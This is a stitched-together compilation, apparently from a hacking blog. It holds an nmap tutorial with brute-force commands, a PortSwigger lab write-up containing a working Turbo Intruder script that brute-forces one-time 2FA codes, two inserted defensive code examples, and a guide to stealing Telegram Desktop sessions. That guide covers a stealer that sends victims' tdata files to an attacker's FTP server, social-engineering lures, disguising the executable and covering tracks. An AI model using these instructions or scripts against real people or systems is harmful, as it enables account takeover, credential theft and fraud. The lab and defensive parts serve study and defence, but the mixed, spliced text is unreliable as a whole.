In cyberattacks, as in war, it all starts with reconnaissance in order to find the opponent's vulnerability. In order to effectively attack, we need to know what software is used on the server and what doors are open or not closed tightly enough. Nmap is a set of tools for scanning the network infrastructure of a web service. It can be used for security checks, to identify running server applications.
Nmap allows you to run pre-built scripts that greatly simplify the analysis of your server. The downside is that now even a smart schoolboy, armed with a bunch of scripts, can pose a threat to the company's servers. We looked at the pictures, now you can work! Let's get down to business.

Install nmap

There is nothing difficult in the installation. We will show the installation using Windows as an example. Linux distributions usually have the latest version of nmap installed by default.

Installing on Windows 10

Go to the nmap download link and download the latest stable release. Then run it as administrator. The installer will prompt you to install all components by default; you can leave the checkboxes on. We will not describe the further steps in detail (accept the license agreement, etc.), everything is easy there.

Running nmap on Windows

You can run nmap both in graphical interface mode and through the command line. To launch the graphical shell, enter nmap in the search bar and select nmap - Zenmap GUI in the results. For further work, you can enter the required commands in the "Command" field, and then click on the Scan button. You can see the scan results in the form of a text report in the window that I carefully labelled "Report".

Figure: Zenmap interface

We are closer to using nmap through the command line, aka console. To run the command line, enter "cmd" in the search bar on the toolbar. Press Enter and the Command Prompt will open. Then you can enter nmap commands directly into it. The command line in Windows 10 with the nmap command entered looks like this:

Install scripts

We also need to install the nmap_vulners script, which will check whether the software we are using contains vulnerabilities. To install it, you need to download the script files and transfer the http-vulners-regex.nse and vulners.nse files to C:\Program Files (x86)\Nmap\scripts.
We start checking

First, we run a scan of our server with the command below to find out which ports are used and for what. The command looks like this (substitute your IP or domain). The command must be entered in the console window, or if you are using Zenmap GUI, then in the "Command" field (example above):

The T5 parameter is responsible for the server analysis speed. The speed can be changed from T0 to T5, where T0 is a very slow analysis speed and T5 is a very fast one. If you don't want to overload the server, then use T2. The -p- parameter means that we will check the entire port range (this will take about 10 minutes). It can be removed and then the script will not scan all ports, but only the first 1000 (the most common). The answer will look something like this:

From the report, we can see that nmap has shown us the ports (under the PORT column) that are active. In this case, we use:

Port 21 is busy with FTP
Port 22 is busy with SSH
Port 80 is listening for the Apache server
Port 3306 is used by MySQL

Now we run our script that will check the vulnerabilities in our software on the server. To do this, run the following command indicating the ports that we will check. You will need to replace the list of ports with your own. Sample report:
Links to the description of the vulnerability follow the vulners line (an example of such a line with a link in the report: CVE-2014-9278 4.0 https://vulners.com/cve/CVE-2014-9278). As you can see from the report, the script analyzed the active software of our server and kindly provided links with a description of each vulnerability found. You will agree that this is very convenient. You can also write the analysis result to a file, which can then be passed on to the responsible developer or system administrator. The results file itself will be located in the directory from which you run the script. An example of such a command is below:

nmap -T5 -sV -Pn 161.35.92.161 --script=vulners.nse -p22,80,443,8080,8443,3306,20,21,23 > result.txt

2. Checking the brute force resistance

In our case, nmap has detected that the server has SSH, FTP and MySQL. Let's try to check how strong the passwords used are.

SSH

Enter the following command (remember that you need to enter it either in the console or in the "Command" field of the Zenmap GUI program):

nmap --script ssh-brute -p22 161.35.92.161 --script-args userdb=users.lst,passdb=passwords.lst

If successful (the process is not fast), the script will display the found password and login. The matched username / password pairs will be displayed after the Accounts line:

In addition, you can extend the standard nmap lists of passwords and users by replacing the users.lst and passwords.lst files. Various brute force databases can be found in this GitHub repository. Files with the password database can be placed in the nmap/nselib/data folder.

FTP

Now we check the FTP port with the following command:

nmap -d --script ftp-brute -p 21 161.35.92.161

Similarly, the service will display matched pairs of usernames and passwords:

MySQL

We check if anonymous login is available:

nmap -sV --script=mysql-empty-password <target>

In case of success:

We are trying to find a username / password pair to enter the MySQL database:
nmap --script mysql-brute -p 3306 <target> --script-args userdb=users.lst,passdb=passwords.lst

Also, if you use a CMS (WordPress, Joomla, Drupal, Bitrix) or other databases (Mongo, Postgres, Redis), then you can find ready-made scripts to check the strength of your passwords and forms. Search by keywords: <name_of_CMS_or_DB> brute force nmap

That's all for today. The continuation will be in the next article, which will be released very soon!
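The article's "Checking the network infrastructure" section ends with a result.txt that is meant to be handed to the responsible developer or sysadmin. The block below is an added editor's example, not part of the article or of nmap, that turns such a file into a prioritised list: it parses the PORT/SERVICE lines and the vulners lines of the same shape as the one quoted above (CVE-2014-9278 4.0 https://vulners.com/cve/CVE-2014-9278), then sorts and groups them by CVSS score. The report text is constructed for the example; the service banners are made up and CVE-0000-0000 / CVE-0000-0001 are placeholder identifiers, not real CVEs.

```python
import re
from collections import defaultdict

# Constructed sample of what `nmap -sV --script=vulners.nse ... > result.txt` prints.
# The CVE-2014-9278 line is the one quoted in the article; the service banners are made
# up and CVE-0000-0000 / CVE-0000-0001 are placeholder ids for this example only.
SAMPLE_REPORT = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd (sample)
22/tcp   open  ssh     OpenSSH (sample)
| vulners:
|   cpe:/a:openbsd:openssh:sample:
|     \tCVE-2014-9278\t4.0\thttps://vulners.com/cve/CVE-2014-9278
|     \tCVE-0000-0000\t9.8\thttps://vulners.com/cve/CVE-0000-0000
|_
80/tcp   open  http    Apache httpd (sample)
| vulners:
|   cpe:/a:apache:http_server:sample:
|     \tCVE-0000-0001\t7.5\thttps://vulners.com/cve/CVE-0000-0001
|_
3306/tcp open  mysql   MySQL (sample)
"""

# "22/tcp   open  ssh     OpenSSH ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|     <tab>CVE-2014-9278<tab>4.0<tab>https://..." -> id, CVSS score, link
FINDING_RE = re.compile(r"^\|\s+(CVE-\d{4}-\d{4,7})\s+(\d+(?:\.\d+)?)\s+(https?://\S+)")


def parse_vulners_report(text):
    """Return one dict per (port, CVE, CVSS score, link) found in the report text."""
    findings = []
    current = None   # (port, proto, service, version) of the most recent PORT line
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = (int(port), proto, service, version.strip())
            continue
        m = FINDING_RE.match(line)
        if m and current is not None:
            cve, score, link = m.groups()
            findings.append({
                "port": current[0], "proto": current[1], "service": current[2],
                "version": current[3], "cve": cve, "score": float(score), "link": link,
            })
    return findings


def prioritize(findings, min_score=7.0):
    """Keep findings at or above min_score, highest CVSS first: the order in which
    the responsible developer or sysadmin should look at them."""
    kept = [f for f in findings if f["score"] >= min_score]
    return sorted(kept, key=lambda f: (-f["score"], f["port"], f["cve"]))


def summarize_by_port(findings):
    """Map port number -> (service, number of CVEs, highest CVSS score)."""
    by_port = defaultdict(list)
    for f in findings:
        by_port[f["port"]].append(f)
    return {port: (fs[0]["service"], len(fs), max(f["score"] for f in fs))
            for port, fs in by_port.items()}


if __name__ == "__main__":
    for f in prioritize(parse_vulners_report(SAMPLE_REPORT), min_score=0.0):
        print("%5d/%s %-6s %-14s %4.1f %s" % (f["port"], f["proto"], f["service"],
                                              f["cve"], f["score"], f["link"]))
```

To use it on a real scan, read result.txt into a string and pass it to parse_vulners_report; the threshold in prioritize is an assumption and should follow your own patching policy.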
The content of the article

Description of the task
More about the task
Solutions
Method 1. Using macros
Method 2. Using the Stepper plugin
Method 3. Using the Turbo Intruder plugin
Conclusion

Hey freaks! Hackfreaks here, so now straight to the point. When attacking a web application, you sometimes need to perform a chain of actions many times. The most striking example is brute-forcing passwords or a second factor of authentication, or multiple use of resources. There are different tools for this. Which one to choose if, for example, we need to make five requests over HTTP a thousand times in a row, maintaining the same session? I'll choose Burp Suite, and here's why. Scripting languages are great for automating multi-step attacks, but not everyone finds it convenient to spend an extra hour writing and debugging code when there is a ready-made solution nearby that requires minimal configuration. Equally important, in order to achieve a high speed of sending and processing requests, as well as for parallel execution, you need to know the correct stacks that do not slow down parallel execution and do not perform unnecessary actions that complicate execution. If you find it difficult to implement such tasks using programming languages or you think it will take a long time, you can use Burp Suite. This tool provides several ways to automate at once:

macros;
the third-party Stepper plugin;
the Turbo Intruder plugin from the makers of Burp Suite.

We will talk about what these approaches give, about their capabilities and limitations. We will consider the work of these three approaches using the example of a problem that has to be solved very often: brute-forcing four-digit one-time passwords that are used ... yes, almost everywhere. Incidentally, for exploiting such a flaw in a bug bounty program we can get a not-so-low reward.
As a test bench, a task from the educational resource PortSwigger Academy, which requires us to perform hundreds of multi-step repetitive actions, is perfect.

DESCRIPTION OF THE PROBLEM

Here's how the test problem is formulated on the PortSwigger Academy website:

The peculiarity of this task is that it is not enough just to iterate over the One Time Password (hereinafter OTP) code with an existing session, because after two incorrect attempts, the application stops considering the session valid. To solve the problem, we have to perform pre-authentication using credentials, and then try to predict the OTP code.

More about the task

We are given an authentication page that looks like this.

Figure: Authentication page

When entering credentials, the application sends the following request to the server:

POST /login HTTP/1.1
Host: ace61ff51f4557d880dbab96004f009d.web-security-academy.net
Cookie: session=rcnBF1vzBD00ZSjcoswRzttRrEPIQNj2
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

csrf=AxCZcrNQ1Y7x8xTI9odKun0alLM34a9a&username=carlos&password=montoya

If we enter the credentials correctly, the next page, for entering the OTP code, appears on the screen.

Figure: OTP input page

After entering a random OTP code, the application will send the following request:

POST /login2 HTTP/1.1
Host: ace61ff51f4557d880dbab96004f009d.web-security-academy.net
Cookie: session=2gt4P1gFqzyxZJIonAlFv9czYetD5pm0
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

csrf=W9Nei8NhTXl5usVKeynuZ3kbjRHaVjW7&mfa-code=1234

If we can guess the OTP code, we will solve the problem. The chance of guessing, in fact, is not so small: 1 in 10,000. Taking into account the fact that the number of attempts we have is not limited, even if it requires additional actions, the result is 100% guaranteed.

What is important to know before we start solving this problem?

The application uses the session identifier that we receive when we enter the site.
It changes after the first round of authentication with the correct credentials.
After authentication, we only have two attempts to enter the OTP code. After two unsuccessful attempts, our session becomes invalid and we have to start the whole process from the beginning.
The app uses CSRF tokens that change on every request. They need to be picked up and substituted for each of our POST requests.

It remains to automate the process of obtaining a session, entering primary credentials, picking up CSRF tokens and trying to predict the OTP code. Let's get started!

SOLUTION METHODS

Method 1. Using macros

Burp Suite macros are a mechanism for automating predefined workflows. You can use macros within session handling rules to solve various problems. It is not difficult to learn how to use them, especially on the example of our problem. With Burp Suite running, we log in as Carlos (the credentials are specified in the task) and collect the HTTP authentication packets up to the 2FA verification. They will be useful to us for setting up a macro. Since the session is constantly changing and is invalidated on unsuccessful attempts to enter the code, we need to maintain it in some way. For this we will use Burp's session handling capabilities. Let's move on to configuring them.

In the Burp menu go to Project Options → Sessions. On the Session Handling Rules panel, click the Add button. The Session handling rule editor dialog will open. Here we will add the rules for maintaining the session and its resumption. In the dialog window, in the Scope tab, in the URL Scope section, select the Include All URLs value so as not to bother with fine-tuning. The session will be maintained for any URL. Let's go back to the Details tab and start creating the macro. In the Rule Actions section, press the Add button and select Run a macro in the window that opens. This is where the process of creating a macro will begin, which will be repeated every time we send our request.
In the macro settings window that opens, select the requests for automation (these will be the requests for the initial login, getting the session ID and the CSRF token for sending the first form). To do this, in the Select macro section, press the Add button. Here we select the login page packet /login (GET request), the login packet with the POST request to the /login page, and the /login2 page packet, where Burp will pick up the CSRF token to enter the OTP code. In the same tab in the lower right corner, you can test the macro we created by clicking the Test macro button. If we click this button, we will see that Burp executes three requests in a row, picks up the Cookie data given to it and receives the CSRF token that should be used to submit the form. Now we only have to automate the input of the OTP code, and the job is done. Click OK and close the dialog boxes. Now, when sending each request, Burp will execute this macro to get a new session, and then substitute the session value and the value of the CSRF token in the outgoing request to update them.

Now let's take the request that sends the OTP code (the POST request to the /login2 page) and send it to Intruder for automation. In the Intruder tab, leave only the payload position in the mfa-code field (like this: mfa-code=§1234§) and go to the Payloads tab. In the Payload Sets section, choose the payload type Numbers and specify the values we want to generate: From: 0, To: 9999, Step: 1, Min integer digits: 4. Go to the Options tab and set the Number of threads to 1 (this is necessary because Burp cannot simultaneously maintain session IDs for two or more threads, only for one). After that, launch Intruder and switch to "waiting" mode. It took Intruder about ten minutes to guess the code (my code was 0643). That's super long! Not even a tenth of all attempts. Why can't it be faster?
Because Session Handling cannot maintain a session for two threads at the same time. Let's summarize what macros give us and what they can do.

Capabilities:

it is convenient to maintain a session by constantly capturing the session ID yourself, even if it is updated;
not only session values are picked up, but also all values that are used to execute a new request: variables, CSRF tokens, and so on.

Problems:

work in only one thread;
if "cross-attacks" are needed that use the sessions of two users at the same time, then this is impossible to implement, since only one session is supported;
a rather unobvious setup, it is very easy to get confused in the numerous menus.

Method 2. Using the Stepper plugin

The Stepper plugin is a free plugin available in the Burp Suite Extender that helps automate workflows. You can find it on GitHub. The developers tell the following about Stepper:

Let's install it and use it to solve our problem.

WARNING

Very important! If you are doing this after the previous experiment, disable the previously created session handling rules and delete the macros!

The Stepper module allows you to select a number of requests and declare in each of them the variables that the request receives from the previous step. Then it substitutes them, as well as the variables obtained from the response body using regular expressions, and passes them on to the next request. Such a simple and straightforward bunch. In the Proxy tab, select the three requests that we need to get a session, do the primary authentication, and retrieve the CSRF token. These are: GET /login, POST /login, GET /login2. Having selected these requests, right-click on them and in the Extensions subsection, click the Add 3 items to Stepper → New Sequence button. We will be asked to choose a name for this sequence. I'll name it evil. Important: make sure that the packets are transferred in the correct order!
To do this, the first packets must be higher than the last ones when sorting in the Proxy tab (this is solved by sorting by packet numbers from lowest to highest). Go to the Stepper module, which appeared in the tabs with the rest of the modules. Here we will see our sequence and three packets, numbered from 1 to 3. We can resend each of the packets by clicking on the Execute Step button to get an example of the response body and test each step.

Let's perform the first step by clicking the Execute Step button. Let's create the first variable for storing and transmitting the session ID by clicking on the Add Variable button in the lower right corner of the module. Let's name the variable session and add a search condition to it in the Condition: field: session=([\d\w]+). Thus, we will have the first variable, session, which we will forward to other requests and reuse. We will also add a second variable, for the CSRF token, which we will forward to the next request for sending credentials. Press the Add Variable button, name the variable csrf and add the condition for finding it in the response body in the Condition: field with the following value: name="csrf" value="([\w\d]+)". Here's what I got after following these steps.

Figure: Initial Stepper setup

Now you can go to the next request, which sends the credentials, and use the session and csrf variables in it. To do this, go to the next step (Step 2) and instead of the existing session value and CSRF token, substitute references to the variables in the following form: $VAR:session$ and $VAR:csrf$.
You end up with something like this:

POST /login HTTP/1.1
Host: ac3f1f861fe209fb80374867009900fe.web-security-academy.net
Cookie: session=$VAR:session$
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

csrf=$VAR:csrf$&username=carlos&password=montoya

Let's execute this second step by clicking on the Execute Step button and get a response in which they will try to redirect us to the /login2 page and give us a new session ID, which we need to capture again using regular expressions and pass to the next step, No. 3. Create the same session variable as in point 4, and go to step number 3. In step 3, do not forget to change the session value to the variable $VAR:session$ again and execute the request, since we just need to get the CSRF token for the last step. After completing the request, add the parsing of the CSRF token again as the csrf variable, as we did in step 5 earlier. Now we can try the entire sequence and check if it works. Click on the Execute Sequence button at the very bottom of the module window. We see that the sequence was executed correctly and at the last step we receive a response with a proposal to enter the OTP code.

Now our task is to run this sequence 10 thousand times. To do this, we transfer the POST request to /login2 from the Proxy tab to Intruder. In the Intruder panel, we need to remove the substitution symbols § from the session and CSRF token fields and leave the substitution only in the mfa-code field, like so: mfa-code=§1337§. For our Stepper sequence to be executed for each Intruder request, add the following header to the request: X-Stepper-Execute-Before: [The name of your sequence].
Also, we substitute the names of our variables $VAR:session$ and $VAR:csrf$ in the Intruder packet, just correcting them to $VAR:[Name of your sequence]:session$ and $VAR:[here too]:csrf$. In Intruder I got the following request packet:

POST /login2 HTTP/1.1
Host: ac311f2c1f2abcbd807689da0068009a.web-security-academy.net
Cookie: session=$VAR:evil:session$
Content-Type: application/x-www-form-urlencoded
X-Stepper-Execute-Before: evil
Content-Length: 51

csrf=$VAR:evil:csrf$&mfa-code=§1337§

In this example, the name of my sequence is evil. Now, before each request from Intruder, the sequence of previously prepared requests will be executed, which will transfer the received session and CSRF token values to the packet. The last step is to set up the payload in the Payloads tab, in the same way as we did in the previous section. Choose the payload type Numbers and specify the values we want to generate: From: 0, To: 9999, Step: 1, Min integer digits: 4. Let's launch our attack! You can track sent packets in the Logger tab that appears or using the Logger++ module. This time I was more fortunate, my code was 0261.

What is important to notice? Unlike the previous version, we are not limited to one thread and created five threads, and the smartest ones could disable the Set Connection: close checkbox in the payload options and remove this header from the packets in Stepper and Intruder to increase the speed of work ... Let's draw conclusions.
Capabilities:

due to the fact that the Stepper module supports sessions, passing the value of the session and token from request to request, we can use multithreading of requests and our variables will not conflict between threads;
cross attacks become available to us, when we can run several sequences in parallel;
a natively understandable request-to-request state transfer setup and an easy-to-add header, X-Stepper-Execute-Before:, that launches Stepper for any module.

Problems:

in fact, Stepper does not allow as many threads as we would like. About three threads do manage to work together, but due to the peculiarities of the module code, a larger number only slows down the execution;
you have to manually adjust the variables for each request, which can look dull and boring. This plugin is more suitable for use with the Repeater module, as the developers warned us about in the welcome message.

Method 3. Using the Turbo Intruder plugin

Turbo Intruder is one of the most powerful tools in Burp Suite and should be mastered by every self-respecting Burp user. It can also be downloaded from GitHub. Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. It is designed to complement Burp Intruder by handling attacks that require exceptional speed, duration, or complexity. This module has the following features.

Fast: Turbo Intruder uses a handcrafted HTTP stack with speed in mind. As a result, it can seriously outperform even trendy asynchronous Go scripts for many purposes (in fact, the stack can be chosen, and most of them will be familiar to you).
Scalability: Turbo Intruder can achieve flat memory usage, allowing robust multi-day attacks. It can also be run in a headless environment via the command line.
Flexibility: Attacks are configurable using Python. This allows complex requirements such as signed requests and multi-stage attack sequences to be met.
In addition, the custom HTTP stack allows you to handle malformed requests that break other libraries.

Convenient: boring results can be automatically filtered out using an advanced diff algorithm adapted from Backslash Powered Scanner. This means you can launch an attack and get useful results in two clicks.

Knowing the basics of Python is required to use Turbo Intruder. However, all we need to get started is to install Turbo Intruder from the Extender module. After installation, we move straight on to solving the task. Select the very first packet in the sequence in the Proxy tab, GET /login, and right-click on it. Then select Extensions → Send to turbo intruder. The Turbo Intruder panel that opens will display the request and sample scripts that you can select to use and modify. In this case, all we need to win is to write a script that solves the task. Below I give my example code and explain the logic of the script (be lenient about its quality, remembering that pentesters cannot code). Note that Turbo Intruder runs scripts under Jython, so the code is Python 2:

    import re
    import time

    # Regular expressions for pulling the session ID and CSRF token out of the traffic
    re_csrf = r'name="csrf" value="([\w\d]+)"'
    re_session = r'session=([\d\w]+)'
    iterable = 0

    def queueRequests(target, wordlists):
        global engine
        # One request per connection so as not to break the execution logic; the number of
        # connections should match what the application can withstand. All these values have
        # to be calibrated from server to server. The lab server does not hold high load very
        # well, so we limit ourselves to five parallel connections.
        engine = RequestEngine(endpoint='https://ac051f441e762a3780359cb6002300a2.web-security-academy.net:443',
                               concurrentConnections=5,
                               requestsPerConnection=1)
        # Run the first requests, which will trigger the subsequent ones.
        # A one-second delay so that the threads do not run in lockstep but alternate.
        for x in xrange(1, 6):
            print '1. GET /login Request'
            engine.queue(target.req, '')
            time.sleep(1)

    def handleResponse(req, interesting):
        global engine
        global iterable
        if 'Location: /my-account' in req.response:
            # If we received this header in the response, we have won
            table.add(req)
            print 'You Win!'
            return None
        if 'Incorrect security code' in req.response:
            # A message about an incorrectly entered code means one attempt has been used up,
            # so we start a new iteration of requests
            table.add(req)
            print '1. GET /login Request'
            engine.queue(target.req, '')
            return None
        if 'Please enter your 4-digit security code' in req.response:
            # If the response asks us to enter the OTP, send a request with an OTP attempt
            match_csrf = re.search(re_csrf, req.response)
            match_session = re.search(re_session, req.getRequest())
            req = '''POST /login2 HTTP/1.1\r\nHost: ac051f441e762a3780359cb6002300a2.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n\r\ncsrf=%s&mfa-code=%s'''
            print '4. POST /login2 Request'
            engine.queue(req, [match_session.group(1), match_csrf.group(1), str(iterable).zfill(4)])
            iterable += 1
            print 'Iterable: ' + str(iterable)
            return None
        if 'Location: /login2' in req.response:
            # A redirect to /login2 means the credentials we entered earlier were correct: we now
            # receive a new session ID and go to that page to collect the CSRF token for the OTP request
            match_session = re.search(re_session, req.response)
            req = '''GET /login2 HTTP/1.1\r\nHost: ac051f441e762a3780359cb6002300a2.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
            print '3. GET /login2 Request'
            engine.queue(req, match_session.group(1))
            return None
        if '<form class=login-form method=POST action=/login>' in req.response:
            # If the first request succeeded, we get the page asking for a username and password:
            # submit the username and password
            match_session = re.search(re_session, req.response)
            match_csrf = re.search(re_csrf, req.response)
            req = '''POST /login HTTP/1.1\r\nHost: ac051f441e762a3780359cb6002300a2.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 70\r\n\r\ncsrf=%s&username=carlos&password=montoya'''
            print '2. POST /login Request'
            engine.queue(req, [match_session.group(1), match_csrf.group(1)])
            return None

Since Turbo Intruder has no convenient way to maintain a session between requests, you have to do it by hand, creating new requests based on the session IDs received from previous requests. To a first approximation, the logic of the script is as follows. I run five initial requests on five concurrent connections. Then the response to each request is processed: the response handler checks which expected response it received and then issues the next logical request. For example, after receiving a response inviting us to enter a password, a request with the username and password is sent, and so on. With this script, I was able to run 400 attempts (~1500 requests) in 30 seconds, solving the task about 20 times faster than in the previous examples. To be honest, we could spend a little more time calibrating the parameters concurrentConnections, requestsPerConnection and pipeline to solve the problem even faster, but this was enough for me. Let's summarize for this example.
Capabilities:
- Turbo Intruder can squeeze the maximum speed out of the application;
- since we write code in Python, you can put logic of almost any complexity into the tool;
- it is extremely convenient to filter the executed requests in the results table, and you can also define your own fields on the requests for sorting and filtering.

Problems:
- you need to write code, and this is not much different from writing scripts from scratch, although it gives a great advantage in using ready-made abstractions for multithreaded and parallel execution of requests;
- there is no documentation for the tool except for a number of examples, which should be enough for you;
- with Turbo Intruder's fastest request engines, requests and responses are not logged in the Logger or Logger++ modules, which makes it inconvenient to view what is happening on the network. You have to use the debugging methods built into Turbo Intruder itself and its abstractions.

CONCLUSION

I personally love the Turbo Intruder tool, but for newbies the Stepper module or built-in macros may be easier to use. However, macros and Stepper may not be suitable for real-world tasks due to their slowness. It is also worth mentioning that in each example I left several ways to improve the speed or to roughly double the number of attempts with a slight increase in the number of requests. If you come up with improvements, share them in the comments. In addition, it will be great if you can tell us about other options for solving this problem. Thanks for reading!
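The Turbo Intruder script above gets exactly one OTP guess per freshly created session, which is why a server-side attempt counter keyed on the session does not slow it down at all. What follows is an added example from the defender's side, not code from the article or from Turbo Intruder: it parses constructed application-log lines in a hypothetical format, shows that counting MFA failures per session misses the pattern while counting per account or per source IP catches it, and replays the same events through a lockout keyed on the account. The log format, IP addresses, session IDs, user names and thresholds are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample application log (hypothetical format, not real lab traffic):
#   <ISO timestamp> <client ip> <method> <path> user=<account> session=<id> result=<outcome>
# 203.0.113.7 drives the flow from the article: a fresh session per OTP guess, so every
# session carries exactly one mfa_failed event. alice is a legitimate user who mistypes once.
SAMPLE_LOG = """\
2024-03-01T10:00:00Z 198.51.100.4 POST /login2 user=alice session=a1 result=mfa_failed
2024-03-01T10:00:09Z 198.51.100.4 POST /login2 user=alice session=a1 result=mfa_ok
2024-03-01T10:01:00Z 203.0.113.7 POST /login2 user=carlos session=s101 result=mfa_failed
2024-03-01T10:01:01Z 203.0.113.7 POST /login2 user=carlos session=s102 result=mfa_failed
2024-03-01T10:01:02Z 203.0.113.7 POST /login2 user=carlos session=s103 result=mfa_failed
2024-03-01T10:01:03Z 203.0.113.7 POST /login2 user=carlos session=s104 result=mfa_failed
2024-03-01T10:01:04Z 203.0.113.7 POST /login2 user=carlos session=s105 result=mfa_failed
2024-03-01T10:01:05Z 203.0.113.7 POST /login2 user=carlos session=s106 result=mfa_failed
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
    r"user=(?P<user>\S+) session=(?P<session>\S+) result=(?P<result>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ev


def parse_log(text):
    return [ev for ev in (parse_line(l) for l in text.splitlines()) if ev]


def max_failures_in_window(events, key, window=timedelta(seconds=60)):
    """For each value of `key` ('session', 'user' or 'ip'), the largest number of
    mfa_failed events on /login2 that fall within any sliding window of length `window`."""
    per_key = defaultdict(list)
    for ev in events:
        if ev["path"] == "/login2" and ev["result"] == "mfa_failed":
            per_key[ev[key]].append(ev["ts"])
    result = {}
    for k, stamps in per_key.items():
        stamps.sort()
        best, start = 0, 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        result[k] = best
    return result


def detect_otp_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return {(key, value): count} for every account, IP or session that reached
    `threshold` failed codes inside the window. Per-session counts never get there here,
    because the attacker starts a new session for every guess."""
    events = parse_log(text)
    alerts = {}
    for key in ("user", "ip", "session"):
        for k, n in max_failures_in_window(events, key, window).items():
            if n >= threshold:
                alerts[(key, k)] = n
    return alerts


class MfaAttemptLimiter:
    """Server-side mitigation: lock the account after max_failures wrong codes within the
    lockout window, regardless of how many sessions those attempts were spread across."""

    def __init__(self, max_failures=3, lockout=timedelta(minutes=15)):
        self.max_failures = max_failures
        self.lockout = lockout
        self.failures = defaultdict(list)  # account -> timestamps of recent failures
        self.locked_until = {}             # account -> datetime when the lock expires

    def is_allowed(self, account, now):
        until = self.locked_until.get(account)
        return until is None or now >= until

    def record_failure(self, account, now):
        """Record a wrong code; return True if this failure triggered a lockout."""
        recent = [t for t in self.failures[account] if now - t <= self.lockout]
        recent.append(now)
        self.failures[account] = recent
        if len(recent) >= self.max_failures:
            self.locked_until[account] = now + self.lockout
            return True
        return False


def replay_with_limiter(text, limiter):
    """Feed the /login2 attempts through the limiter and return how many code
    submissions the server would actually have evaluated."""
    evaluated = 0
    for ev in parse_log(text):
        if ev["path"] != "/login2" or not limiter.is_allowed(ev["user"], ev["ts"]):
            continue
        evaluated += 1
        if ev["result"] == "mfa_failed":
            limiter.record_failure(ev["user"], ev["ts"])
    return evaluated


if __name__ == "__main__":
    print(detect_otp_bruteforce(SAMPLE_LOG))
    print(replay_with_limiter(SAMPLE_LOG, MfaAttemptLimiter()))
```

On the constructed log the detector alerts on the account carlos and on the source IP, while every session sits at one failure; the limiter evaluates only the first three wrong codes for carlos and rejects the rest until the lock expires. The design point is that the key the counter uses decides whether the multi-step flow in the article is an attack or just a long list of one-attempt sessions.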
General principles Hey my little freaks. Today I’ll gonna cover your most requested method. So, Straight to the point. This Hacking method is stealing someone else’s session of the desktop version of Telegram for Windows. Those who use the messenger on the computer mostly use it. If the victim uses Telegram only on the phone, this method will not work. Sorry. I’ll cover that method Later. let’s Hunt begin ;) WARNING So, in order to intercept this very session, we need to take possession of only two files of the victim. Here they are: • C: \ Users \ * Computer username * \ AppData \ Roaming \ Telegram Desktop \ tdata: D877F783D5D3EF8Cs (the last character may be different) • D877F783D5D3EF8C \ maps (the last character may also be different) Data acquisition methods 1. Theft with a stealer . This is the most affordable, efficient and reliable way. In this article, we will analyze it in detail. 2. Gaining physical access to the desired machine . Everything is simple here: you quickly copy the files to your flash drive or upload them somewhere on the Internet. But we will not always have such an opportunity, you understand. And still, take a note: under certain conditions, it can be working. And you never know when they will appear. 3. Social engineering . You can just fool this data. For example, under this pretext: the files are overwritten and you can’t log into your account. It sounds silly, but you will find your mammoth, believe me. Or you can do this: put the Telegram logo on the avatar, change the “username” accordingly and lure the files as a “moderator”. The method is proven. Important: write to the victim before registering an account, because immediately after these actions, Telegram throws a spam block. Instructions for hacking with a stealer 1. Download this archive . Our stealer is there. 2. Install Python on your PC . 3. Follow the link and install the Sublime Text 3 code editor. 4. We pass registration on the FTP-server . 
5.Using the installed Sublime Text code editor, open the file downloaded in the 1st paragraph and write the data from paragraph 4 in the code: host / login and password from our FTP server (all information will be received there). 6. Compile the Python code into an exe file . 7. We send the finished exe-file to the victim and wait for her to open it. └As a result, we will get 2 .zip files that will come to the FTP server. 8. Download Telegram Portable , then open the tdata folder in Telegram. There we need the D877F783D5D3EF8C folder — open it and replace maps or map1 with our file from the tdata.zip server. 9. Open tdata again, then find the file D877F783D5D3EF8C and delete it, and in its place we upload our file from our tdata1.zip or tdata2.zip. 10. Open Telegram Portable and enter the stolen session. How to provoke a victim to open an exe file There are no universal solutions here. If you have at least some information about the victim, it will be a huge advantage. What are her interests? What does she do? Any information can help send the file in a way that looks appropriate and the victim’s desire to open it is natural. Imagine this situation: we want to hack the channel owner about ways to make money. For example, you can write to the admin on behalf of a channel subscriber, tell a heartbreaking story about the successes we have achieved with the help of his schemes, and throw off the “private software” as a thank you. And you can make it smarter. Let’s say you find a seller of a self-written program on a thematic forum, take his nickname and use it as an account name. From it we write to the admin: “so and so, I sell software, here is the topic on the board, I want to advertise on your channel, how about barter?” As you can imagine, this is a quid pro quo. We are cool private software. He’s free advertising. There is a high probability that the channel owner will be interested in such an offer. And so he finds himself on our hook. 
Addition There are ways to glue an exe file, for example, with an image or a text document. This makes our task much easier. After all, the chance that the victim will open the picchu is much higher. To do this, use the Joiner. You can find instructions on the internet. Recommendations Do not neglect the means of anonymization. If you follow the instructions, the victim will never know about the crime. But we still advise you to play it safe. If we are talking about hacking with a specific purpose, such as “steal the channel”, then there is nothing to talk about: you need to take care of security 100%. Thanks for reading!
